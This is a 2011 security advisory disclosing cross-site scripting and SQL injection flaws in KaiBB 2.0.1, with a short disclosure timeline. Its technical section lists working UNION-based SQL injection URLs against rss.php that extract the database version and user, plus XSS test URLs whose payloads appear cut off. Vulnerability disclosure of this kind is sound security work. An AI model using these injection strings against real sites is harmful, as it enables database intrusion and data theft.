Advisory: KaiBB 2.0.1 XSS and SQL Injection vulnerabilities Advisory ID: SSCHADV2011-027 Author: Stefan Schurtz Affected Software: Successfully tested on KaiBB 2.0.1 Vendor URL: Vendor Status: informed CVE-ID: - ========================== Vulnerability Description: ========================== KaiBB 2.0.1 is prone to XSS and SQL Injection vulnerabilities ================== Technical Details: ================== Cross-site Scripting http:///kaibb/?' http:///kaibb/index.php?' SQL Injection http:///kaibb/rss.php?forum=' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL AND 'a'='a http:///kaibb/rss.php?forum=' UNION ALL SELECT NULL, version(), NULL, NULL, NULL, NULL, NULL AND 'a'='a http:///kaibb/rss.php?forum=' UNION ALL SELECT NULL, user(), NULL, NULL, NULL, NULL, NULL AND 'a'='a ========= Solution: ========= - ==================== Disclosure Timeline: ==================== 08-Oct-2011 - informed developers 08-Oct-2011 - release date of this security advisory ======== Credits: ======== Vulnerability found and advisory written by Stefan Schurtz. =========== References: ===========